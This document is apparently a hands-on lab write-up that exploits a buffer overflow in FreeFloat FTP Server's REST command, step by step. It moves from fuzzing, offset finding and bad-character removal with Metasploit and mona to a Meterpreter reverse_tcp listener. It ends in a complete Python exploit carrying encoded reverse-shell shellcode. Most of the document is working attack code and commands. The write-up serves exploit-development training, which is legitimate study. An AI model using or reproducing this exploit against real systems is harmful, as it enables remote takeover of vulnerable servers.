FreeFloat FTP Server

Target: The Vulnerable

Trigger buffer overflow:

import sys
from socket import *

ip = "192.168.119.153"
port = 21

buf = "\x41" * 1000

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Restart Windows VM and Re-attach target!

Create pattern:

#  /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000 > /tmp/pattern

Find offset!

import sys
from socket import *

ip = "192.168.119.153"
port = 21

buf = open('/tmp/pattern','r').read()
print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Register EIP contain 41326941.

Find exact offset!

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1000 -q 41326941
[*] Exact match at offset 246

Using mona on Immunity Debugger:

• Set working folder

  !mona config -set workingfolder c:\logs\%p
  

• Find gadget jmp esp

  !mona jmp -r ESP
  

• Generate bytearray

  !mona bytearray
  

Restart Windows VM and Re-attach target!

Find bad charachters!

import sys
from socket import *

ip = "192.168.119.153"
port = 21

bytearray = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

bufsize = 1000
buf = 'A'*246 # EIP offset from findmsp
buf += 'BBBB' # EIP overwrite
buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP
buf += bytearray
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Finding bad chars:

!mona compare -f c:\logs\FTPServer\bytearray.bin -a 0x0230fc00 (the address contained on ESP)

Remove bad chars:

!mona bytearray -cpb \x00\x0a\x0d

Restart Windows VM and Re-attach target!

Try Again!

import sys
from socket import *

ip = "192.168.119.153"
port = 21

bytearray = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22"
"\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42"
"\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62"
"\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82"
"\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2"
"\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2"
"\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2"
"\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

bufsize = 1000
buf = 'A'*246 # EIP offset from findmsp
buf += 'BBBB' # EIP overwrite
buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP
buf += bytearray
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Find gadget jmp esp or \xff\xe4 at SHELL32.dll.

7c9e30d7
\xd7\x30\x9e\x7c

Open listener

# msfconsole
back
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.151
set lport 443
set ExitOnSession false
exploit -j

We need to ensure that ESP is not pointing to the shellcode when the decoder routine is executed. We will do this by adding an instruction which will decrement ESP. To obtain the opcodes that represent the instruction, we will use another tool from the Metasploit Framework, ‘metasm_shell.rb’. Execute the following commands on Kali Linux:

cd /usr/share/metasploit-framework/tools/exploit/
./metasm_shell.rb

The ‘metasm_shell.rb’ script will give us an interactive prompt where we can enter CPU instructions and get the appropriate opcodes. Since we want to decrement ESP, we will try the following command:

metasm > sub esp,240h
"\x81\xec\x40\x02\x00\x00"

Uh oh, we’ve hit a snag. Notice that the opcode we got contains one of our bad characters (\x00). This would break our exploit. Lets see if we can find another instruction that will achieve the same result, but hopefully not result in opcode with bad characters. Instead of subtracting from ESP, lets try to add a negative number to it and see what happens:

metasm > add esp,-240h
"\x81\xc4\xc0\xfd\xff\xff"

Put it all together:

import sys
from socket import *

ip = "192.168.119.155"
port = 21

# Windows reverse shell
buf =  ""
buf += "\xdb\xd0\xb8\x97\x29\x9b\x11\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x54\x83\xeb\xfc\x31\x43\x14\x03\x43\x83\xcb"
buf += "\x6e\xed\x43\x89\x91\x0e\x93\xee\x18\xeb\xa2\x2e\x7e"
buf += "\x7f\x94\x9e\xf4\x2d\x18\x54\x58\xc6\xab\x18\x75\xe9"
buf += "\x1c\x96\xa3\xc4\x9d\x8b\x90\x47\x1d\xd6\xc4\xa7\x1c"
buf += "\x19\x19\xa9\x59\x44\xd0\xfb\x32\x02\x47\xec\x37\x5e"
buf += "\x54\x87\x0b\x4e\xdc\x74\xdb\x71\xcd\x2a\x50\x28\xcd"
buf += "\xcd\xb5\x40\x44\xd6\xda\x6d\x1e\x6d\x28\x19\xa1\xa7"
buf += "\x61\xe2\x0e\x86\x4e\x11\x4e\xce\x68\xca\x25\x26\x8b"
buf += "\x77\x3e\xfd\xf6\xa3\xcb\xe6\x50\x27\x6b\xc3\x61\xe4"
buf += "\xea\x80\x6d\x41\x78\xce\x71\x54\xad\x64\x8d\xdd\x50"
buf += "\xab\x04\xa5\x76\x6f\x4d\x7d\x16\x36\x2b\xd0\x27\x28"
buf += "\x94\x8d\x8d\x22\x38\xd9\xbf\x68\x54\x2e\xf2\x92\xa4"
buf += "\x38\x85\xe1\x96\xe7\x3d\x6e\x9a\x60\x98\x69\xdd\x5a"
buf += "\x5c\xe5\x20\x65\x9d\x2f\xe6\x31\xcd\x47\xcf\x39\x86"
buf += "\x97\xf0\xef\x33\x92\x66\xd0\x6c\xd5\xe1\xb8\x6e\x1a"
buf += "\x0c\x82\xe6\xfc\x5e\xa4\xa8\x50\x1e\x14\x09\x01\xf6"
buf += "\x7e\x86\x7e\xe6\x80\x4c\x17\x8c\x6e\x39\x4f\x38\x16"
buf += "\x60\x1b\xd9\xd7\xbe\x61\xd9\x5c\x4b\x95\x97\x94\x3e"
buf += "\x85\xcf\xc4\xc0\x55\x0f\x6d\xc1\x3f\x0b\x27\x96\xd7"
buf += "\x11\x1e\xd0\x77\xea\x75\x62\x7f\x14\x08\x53\x0b\x22"
buf += "\x9e\xdb\x63\x4a\x4e\xdc\x73\x1c\x04\xdc\x1b\xf8\x7c"
buf += "\x8f\x3e\x07\xa9\xa3\x92\x9d\x52\x92\x47\x36\x3b\x18"
buf += "\xb1\x70\xe4\xe3\x94\x03\xe3\x1c\x6a\x21\x4c\x75\x94"
buf += "\x65\x6c\x85\xfe\x65\x3c\xed\xf5\x4a\xb3\xdd\xf6\x41"
buf += "\x9c\x75\x7c\x07\x6e\xe7\x81\x02\x2e\xb9\x82\xa0\xeb"
buf += "\xac\x0c\x47\x0c\xd1\xee\x74\xda\xe8\x84\xbd\xde\x4e"
buf += "\x96\xf4\x43\xe6\x3d\xf6\xd0\xf8\x17"
shellcode = buf

bufsize = 1000
eip = "\xd7\x30\x9e\x7c" # 0x7c9d30d7 - jmp esp [SHELL32.dll] (Little endian)
move_esp = "\x81\xc4\xc0\xfd\xff\xff" # add esp,-240h
buf = 'A'*246 # EIP offset from findmsp
buf += eip # EIP overwrite
buf += move_esp
buf += 'C'*8 # Add 8 additional bytes of padding to align the bytearray with ESP
buf += shellcode
buf += 'D'*(bufsize - len(buf))

print "[+] Connecting..."

s = socket(AF_INET,SOCK_STREAM)
s.connect((ip,port))
s.recv(2000)
s.send("USER test\r\n")
s.recv(2000)
s.send("PASS test\r\n")
s.recv(2000)
s.send("REST "+buf+"\r\n")
s.close()

print "[+] Done."

The result from Windows VM:

Reference

• https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/